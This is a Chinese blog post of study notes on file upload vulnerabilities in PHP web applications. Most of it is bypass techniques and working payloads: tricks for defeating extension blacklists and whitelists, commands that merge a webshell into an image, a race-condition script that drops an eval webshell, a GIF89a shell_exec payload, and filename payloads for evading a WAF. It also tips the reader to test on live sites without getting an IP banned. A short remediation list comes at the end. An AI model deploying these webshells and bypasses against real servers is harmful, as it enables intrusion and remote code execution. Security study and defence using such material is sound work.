文件上传漏洞总结

已于 2022-03-26 19:28:56 修改
阅读量9.8k 收藏 83
点赞数 18
分类专栏: 安全知识总结 小迪安全学习 文章标签: 安全 web安全
于 2022-03-18 12:48:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46739058/article/details/123554282
版权

目录

1、文件上传漏洞原理

2、常见的文件上传类型

3、文件上传注入点

4、web中常见的上传验证

黑名单常见自定义过滤规则

白名单常见的过滤规则

5、逻辑数组绕过

5.1、图片一句话木马的制作与利用

5.2、文件头检查

5.3、getimagesize()图像信息判断

5.4、竞争条件攻击

5.5、突破exif_imagetype()

5.6、脚本解析漏洞

6、WAF绕过

7、文件上传安全修复方案

1、文件上传漏洞原理

网站Web应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型,此时攻击者就可以上传一个webshell到一个Web可访问的目录上,并将恶意文件传递给如PHP解释器去执行,之后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作。还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护。

2、常见的文件上传类型

常规类:扫描获取上传,会员中心上传,后台系统上传,各种途径上传

CMS类:已知CMS源码,搜索已知cms漏洞(wordpress等)

编辑器类:ckeditor,fckeditor,kindeditor,xxxeditor,也是搜索相关编辑器漏洞

中间件类:可以通过中间件解析漏洞,上传包含后门代码的图片

3、文件上传注入点

1. 常规文件上传地址的获取说明

使用谷歌语法搜索inurl:upload.php

2. 寻找特定网站的文件上传:

site:xx.xx upload

3. 通过后台目录扫描工具扫描

4、web中常见的上传验证

后缀名:黑名单、白名单

文件类型:MIME信息(数据包里Content-Type:image/gif)

文件头:内容头信息

Gif图片(GIF89a)

jsp脚本(JFIF)

黑名单常见自定义过滤规则

replace('php','')

$deny_ext = array('.asp','.aspx','.php','.jsp');//黑名单数组
$file_name = trim($_FILES['upload_file']['name']);//去掉文件名两侧的空白字符
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');//截取最后.之后的内容
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空

 绕过方式(黑盒测试):

1、a.php::$DATA,Windows系统下PHP服务器会将后缀名带::$DATA的文件当作文件流处理,过滤不起作用,上传到服务器之后,截取::之前的格式作为文件后缀,也就是a.php

2、大小写绕过

3、.htaccess文件(配置文件,将文件名为shana的文件当作php文件执行)

<FilesMatch "shana">
SetHandler application/x-httpd-php
</FilesMatch>

4、针对黑名单规则只过滤一次,双写脚本后缀        一次过滤: a.php->a. a.pphphp->a.php

5、点绕过。

$file_name = deldot($file_name);//删除文件名末尾的点

可以更改上传文件的后缀名a.php改为a.php. .

经过代码过滤之后文件后缀名变为a.php. 。从而绕过黑名单提交到服务器,Windows服务器不允许后缀名最后带.,因此将文件后缀名还原为a.php

6、空格绕过。"a.php "不会匹配黑名单的.php从而绕过。且上传后会被Windows服务器自动去掉空格。

7、中间件解析漏洞。

白名单常见的过滤规则

对于网站而言,白名单验证比名单拦截更要安全

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1); //截取后缀名
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

绕过白名单验证方式:

1、%00和0x00截断。%00是被服务器解码为0x00发挥了截断作用

0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。

%00和0x00是有区别的:%00是URL中的,0x00是文件命名

%00需要PHP版本小于5.3.4,且打开php的配置文件php-ini,将magic_quotes_gpc(魔术引号)设置为Off

get会自动解码 %00

post不会解码 %00 -> url编码

2、0x0a截断:原理同上

3、MIME绕过。burp抓包,修改Content-type值为合法的image/jpeg,image/gif等即可绕过

5、逻辑数组绕过

5.1、图片一句话木马的制作与利用

cmd命令行,将图片与马合成图片🐎

copy 1.png /b + shell.php /a webshell.jpg

 利用文件包含漏洞,include函数解析图片马

5.2、文件头检查

主要是检测文件内容开始处的文件幻数,比如图片类型的文件幻数如下,要绕过jpg文件幻数检测就要在文件开头写上下图的值:

在这里插入图片描述
Value = FF D8 FF E0 00 10 4A 46 49 46

要绕过gif文件幻数检测就要在文件开头写上下图的值

在这里插入图片描述
Value = 47 49 46 38 39 61

要绕过png文件幻数检测就要在文件开头写上下面的值

在这里插入图片描述
Value = 89 50 4E 47

然后在文件幻数后面加上自己的一句话木马代码就行了

5.3、getimagesize()图像信息判断

 如果上传的不是图片文件,那么getimagesize()就获取不到信息,则不允许上传。

通过Linux合成图片马,此时使用getimagesize()既可以获取图片信息,文件后缀php也能被解析为脚本文件,从而绕过getimagesize()的限制。

cat image.jpg webshell.php > image.php

5.4、竞争条件攻击

一些网站上传文件的逻辑是先允许上传任意文件,然后检查上传的文件是否包含Webshell脚本,如果包含则删除文件。这里存在一个问题是文件上传成功后和删除文件之间存在一个短的时间差(因为要执行文件上传和删除文件的操作),攻击者就可以利用这个时间差完成竞争条件的上传漏洞攻击。

  利用:可以先上传一个webshell脚本10.php,10.php的内容是生成一个新的webshell脚本shell.php。10.php的代码如下

<?
fputs(fopen('../shell.php','w'),'<?php @eval($_POST['x']) ?>');
?>

        当10.php上传成功后,客户端检查脚本文件后会自动生成shell.php。

5.5、突破exif_imagetype()

exif_imagetype() 读取一个图像的第一个字节并检查其签名。如果发现了恰当的签名则返回一个对应的常量,否则返回 FALSE。返回值跟getimagesize() 返回的数组中的索引 2 的值是一样的,但exif_imagetype函数快得多。PHP需要开启php_exif模块

返回值与图像类型对应表如下

绕过方法:

给上传脚本加上相应的幻数头字节就可以,php引擎会将 <?之前的内容当作html文本,不解释而跳过之,后面的代码仍然能够得到执行比如下面:

(一般不限制图片文件格式的时候使用GIF的头比较方便,因为全都是文本可打印字符。)

GIF89a

<?

php echo shell_exec($_GET['cmd']);

?>

图片文件通常有称作幻数的头字节,我们来看一下几种图片文件的幻数:

(注意!下面是二进制而不是文本格式的数据)

JPG

FF D8 FF E0 00 10 4A 46 49 46

GIF(相当于文本的GIF89a)

47 49 46 38 39 61

PNG

89 50 4E 47

通过检查头几位字节,可以分辨是否是图片文件

5.6、脚本解析漏洞

 参考链接:https://blog.csdn.net/weixin_43965597/article/details/107665597

参考链接:https://blog.csdn.net/weixin_34088838/article/details/94607178

6、WAF绕过

常见的绕过方法:

1、数据溢出-防匹配(xxx...)
2、符号变异-防匹配(' " ;)
3、数据截断-防匹配(%00 ; 换行)
4、重复数据-防匹配(参数多次)

1、数据溢出绕过WAF需要大量的模糊测试,当垃圾参数过多时,WAF的检测就可能会失效

 

2、符号变异就是猜测WAF检测的依据,例如filename="a.php"

网站安全狗WAF软件现在的机制就是匹配单/双引号里面的内容

pyload

"xx'.php
"xx;.php
'xx;.php
";xx.php
';xx.php
" xx.php
' xx.php
"x x.php
'x x.php

 

  

3、数据截断-防匹配(%00 ; 换行)

通过用; 或者 %00 或者 换行 来截断文件名,使得WAF错误识别或不能识别文件类型从而达到绕过WAF

  • 文件名中加入图片后缀提前用分号截断(可行)

原因是防护软件只检测分号(;)前面的部分,一旦正确就放行,不再检测后面的,然而apache服务器会取最后的文件类型来命名

payload

"ab.jpg;.php"

"abc.php%00.jpg"                             #注意%00需要经过url编码

"x.p
h
p"

x.ph
p

x.
p
h
p

4、重复数据-防匹配(参数多次)

payload

filename="Content-Disposition: form-data; name="upload_file";x.php"
filename="xx.jpg";filename="xx.jpg";filename="xx.jpg";filename="xx.jpg";...........filename="xx.php";

  • 重复filename 

前面的filename为可接受的文件格式,最后一个为php文件格式,前面的重复多次,可绕过。

●filename中配合其他参数

配合Content-Disposition

 配合Content-Type

5、配合目录命名绕过

"/"与";"配合绕过

  payload:

filename="/jpeg;x.php"
filename="/jpeg;/x.php"

  

6、配合FUZZ字典测试绕过

手工测试的话有点麻烦,可以借助写好的字典配合BP进行批量测试,先在本地测试,然后在真实环境进行测试,以防封IP。

https://github.com/TheKingOfDuck/fuzzDictsicon-default.png?t=M276https://github.com/TheKingOfDuck/fuzzDicts
GitHub - fuzzdb-project/fuzzdb: Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.icon-default.png?t=M276https://github.com/fuzzdb-project/fuzzdb

7、文件上传安全修复方案

后端验证:采用服务端验证模式

后缀检测:基于黑名单,白名单过滤

MIME 检测:基于上传自带类型检测

内容检测:文件头,完整性检测

自带函数过滤:参考 uploadlabs 函数

自定义函数过滤:function check_file(){}

WAF 防护产品:宝塔,云盾,安全公司产品等

Dues_D
关注
  • 18
    点赞
  • 83
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Web安全--文件上传漏洞
bobo_milk的博客
11-11 1088
本文参考了一些文章,如有侵权请留言删除。该文章基于upload-labs基础靶场进行编写。
上传文件漏洞总结
01-10
上传文件的总结上传文件的总结上传文件的总结上传文件的总结
文件上传漏洞(总结)
sGanYu
07-30 1325
文件上传漏洞是什么 文件上传必须满足的条件 文件上传漏洞的危害 文件上传的种类 无验证 前端验证 .htaccess 文件头检查 MiMe绕过 双写后缀 文件上传漏洞是什么 指的是用户上传了一个可以执行的脚本,运行此脚本后获得执行服务器端命令的权限,一般用作与于在上传图片或者文件处,用户通过一些手段绕过检测机制,从而上传恶意代码并且执行 文件上传必须满足的条件 1.可以上传该文件 2.上传的路径可以知道并且可以访问 3.可执行该上传的文件 文件上传漏洞的危害 文件上传相对于
文件上传漏洞详解
zxcvbnmasdflzl的博客
06-27 843
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果.
2024年最新fckeditor编辑器上传漏洞getshell——突破(1),2024物联网嵌入式开发不死我不倒
最新发布
2401_85011796的博客
05-14 811
百度搜索fckeditor编辑器漏洞利用,找到参考链接:https://www.cnblogs.com/milantgh/p/3775396.html,按照链接中常用上传地址挨个进行测试。访问上传的文件后,发现是图片,并没有当作asp进行解析。_x(1).jpg,以前这种方法是可以的,但这个环境不可以,知道此方法就行。接下来,查看目标网站搭建平台,发现是IIS6.0,那么可以结合IIS6.0的解析漏洞进行利用。测试过程中发现第三个会弹窗提示,说明没有访问到上传目录,那么添加…上传logo.asp;
WEB安全基础-文件上传
HAKUNAMATATATTA的博客
11-21 2450
什么是文件上传---将客户端数据以文件形式封装,通过网络协议发送到服务器端。在服务器端解析数据,最终在服务端硬盘上作为真实的文件保存。通常一个文件以HTTP协议进行上传时,将以POST请求发送至Web服务器,Web服务器收到请求并同意后,用户与Web服务器将建立连接,并传输数据。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,"文件上传"本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。
文件上传漏洞的思维导图
04-19
总结文件上传漏洞的相关知识
上传攻击漏洞总结
06-12
文件介绍了主流的文件上传漏洞,以及如何绕过文件检测来达到上传的目的。
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
在实验中,我们使用了 DVWA 安全测试平台,搭建了一个有文件上传漏洞的网站,使用中国菜刀工具获取了网站的 webshell,进而获取了网站和所在服务器的相关数据。 在防御文件包含漏洞时,务必要禁用文件包含功能,...
javaWeb安全验证漏洞修复总结
08-26
目前很多业务都依赖于互联网,例如说网上银行、网络购物、网游等,很多恶意...同时,对Web服务器的攻击也可以说是形形色色、种类繁多,常见的有挂马、SQL注入、缓冲区溢出、嗅探、利用IIS等针对Webserver漏洞进行攻击。
文件上传漏洞的原理与解析
jdk12123的博客
09-17 366
这意味着如果您向这段代码发送一个POST请求,并在请求中包含名为"1"的参数,那么该参数的值将被当作PHP代码来执行。这样的代码结构非常危险,因为它可能会使攻击者执行任意的PHP代码,并对服务器进行恶意操作。提供了针对目录改变配。置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所。然后,我们可以进一步跟据目录去获取文件,之后我们根据CTF题目去实践一下。怎么是假的,返回页面,使用phpinfo();诶怎么不行啊,ls是Linux的,windows是dir。
文件上传(包括编辑器上传)漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
weixin_42075643的博客
03-28 3790
文件上传绕过总结;编辑器文件上传;渗透测试记录
一文爽 文件上传漏洞原理、方法和类型详细解析
MachineGunJoe666
05-23 950
文件上传漏洞web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。
文件上传漏洞
金色%夕阳的博客
04-29 2212
文件上传漏洞 1. 文件上传功能 文件上传功能是大部分WEB应用的必备功能,站点常见文件上传点有:用户头像上传、社交类网站允许用户上传照片、服务类网站需要用户上传证明材料的电子档、电商类网站允许用户上传图片展示商品情况等。然而,看似普通的文件上传功能如果缺法安全防护措施,就存在巨大的安全风险。 2. 文件上传漏洞 文件上传漏洞是指攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。通常是因web应用程序没有对上传的文件进行安全判断或者判断条件不够严谨,
文件上传验证常见的绕过方式!
oldboyedu1的博客
03-29 1568
在开发中,为了方便维护和更新,会先对扩展名进行验证,如果上传文件的扩展名为可执行脚本,便会对其POST的数据进行检测,如果存在恶意代码就会禁止上传。而对于这类上传检测的绕过大致有这几种思路,一是利用变种木马绕过其检测;白名单检测安全性远高于黑名单检测,仅允许上传白名单所允许的几种扩展名,因此黑名单中的大小写混淆、特殊的扩展名等绕过方式对白名单检测均无效。黑名单检测是常见的一种上传验证方式,不允许上传黑名单中存在的扩展名,其安全性低于白名单检测,对其的绕过方式也远多于白名单检测。6、服务器目录限制的绕过。
文件上传漏洞靶场源码关键语句分析
weixin_44840696的博客
05-09 1007
漏洞靶场是进行渗透技术学习和提高的利器,可以学习到很多基本的Payload和渗透思路,但是学习Payload只是应该达到的基本目标,对过滤本身设置的思路以及对应的绕过思路进行思考和总结才是更为重要的。也就是“渔”和“鱼”的关系。 过滤代码可以使用很多种语言来编写,如javascript、PHP等,代码很多时候是相通或可以类比的,因此对于很多代码功底不是很深的初学者,可以对基本代码进行分析和学习,...
文件上传漏洞 找绝对路径
07-27
文件上传漏洞是指在网站或应用程序中存在漏洞,使得攻击者可以上传恶意文件到服务器上。通过利用文件上传漏洞,攻击者可以执行任意代码,获取服务器权限,或者在服务器上执行其他恶意操作。 要找到文件上传漏洞的绝对路径,可以通过以下步骤进行: 1. 首先,尝试上传一个文件,观察上传的文件是否被服务器接受并保存。如果上传成功,可以尝试修改文件的扩展名或内容,以绕过服务器的文件类型检查。这样可以确保上传的文件能够被服务器执行。 2. 上传成功后,需要找到上传文件的绝对路径。可以通过查看上传文件的URL或文件路径来获取。通常,上传的文件会被保存在服务器的特定目录中,可以通过查看服务器配置文件或应用程序代码来确定上传文件的保存路径。 3. 一旦找到上传文件的绝对路径,可以使用蚁剑等工具来连接服务器并执行代码。通过连接服务器,可以利用上传的文件执行任意代码,获取服务器权限或进行其他操作。 需要注意的是,为了使上传的文件能够被服务器执行,通常需要将文件的扩展名修改为服务器支持的脚本语言类型,如PHP。这样服务器在执行文件时会将其作为脚本来解析并执行其中的代码。 总结起来,要找到文件上传漏洞的绝对路径,需要通过上传文件并修改扩展名或内容来绕过服务器的文件类型检查,然后查找上传文件的保存路径,并使用相应的工具连接服务器并执行代码。 #### 引用[.reference_title] - *1* *2* *3* [文件上传漏洞详解](https://blog.csdn.net/2301_76160896/article/details/131215650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dues_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值